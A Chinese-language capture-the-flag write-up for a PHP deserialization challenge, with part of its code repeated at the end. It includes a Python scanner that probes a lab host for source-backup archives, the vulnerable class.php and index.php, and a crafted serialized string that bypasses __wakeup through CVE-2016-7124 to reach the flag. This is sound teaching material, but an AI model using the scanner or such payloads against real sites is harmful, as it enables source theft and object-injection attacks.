PHP

分享一个很有意思的脚本：

# python3
import requests
# url1为被扫描地址，后不加‘/’
url1 = 'http://dc978cce-0571-40d6-8a75-ac2c41c57fed.node3.buuoj.cn'
# 常见的网站源码备份文件名
list1 = ['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp']
# 常见的网站源码备份文件后缀
list2 = ['tar', 'tar.gz', 'zip', 'rar', 'bak']

for i in list1:
    for j in list2:
        back = str(i) + '.' + str(j)
        url = str(url1) + '/' + back
        print(back + '    ', end='')
        print(len(requests.get(url).text))

源于：常用网站源代码备份脚本，可以按照需求添加字典。

扫出来www.zip，下载后发现网页有假flag以及class.php。

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

调用在index.php：

<?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
    ?>

要求密码必须为100且用户名必须为admin，但是在__wakeup函数中会将username设置为'guest',就需要绕过__wakeup。

老考点了，用到的是CVE-2016-7124漏洞，在特定的PHP版本绕过__walkup。

要注意到的是反序列化后的public,private以及protected三种变量的值具体表达方法不一样，使用的时候要注意区分。

当一个类为：

<?php
class Example{
	public $test = 'a';
}

$example = new Example();

echo serialize($example);

返回结果为：

O:7:"Example":1:{s:4:"test";s:1:"a";}

当类型为private时，情况就会稍微复杂一些。

<?php
class Example{
	private $test = 'a';
}

$example = new Example();

echo serialize($example);

返回结果为：

O:7:"Example":1:{s:13:"%00Example%00test";s:1:"a";}

当类型为protected

<?php
class Example{
	protected $test = 'a';
}

$example = new Example();

echo serialize($example);

返回结果为：

O:7:"Example":1:{s:7:"%00*%00test";s:1:"a";}

本题最终构造的反序列化字符串：

O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

PreviousKnife NextHttp

Last updated 2 years ago

# python3 import requests # url1为被扫描地址，后不加‘/’ url1 = 'http://dc978cce-0571-40d6-8a75-ac2c41c57fed.node3.buuoj.cn' # 常见的网站源码备份文件名 list1 = ['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp'] # 常见的网站源码备份文件后缀 list2 = ['tar', 'tar.gz', 'zip', 'rar', 'bak'] for i in list1: for j in list2: back = str(i) + '.' + str(j) url = str(url1) + '/' + back print(back + ' ', end='') print(len(requests.get(url).text))

<?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ $this->username = $username; $this->password = $password; } function __wakeup(){ $this->username = 'guest'; } function __destruct(){ if ($this->password != 100) { echo "NO!!!hacker!!!"; echo "You name is: "; echo $this->username;echo ""; echo "You password is: "; echo $this->password;echo ""; die(); } if ($this->username === 'admin') { global $flag; echo $flag; }else{ echo "hello my friend~~sorry i can't give you the flag!"; die(); } } } ?>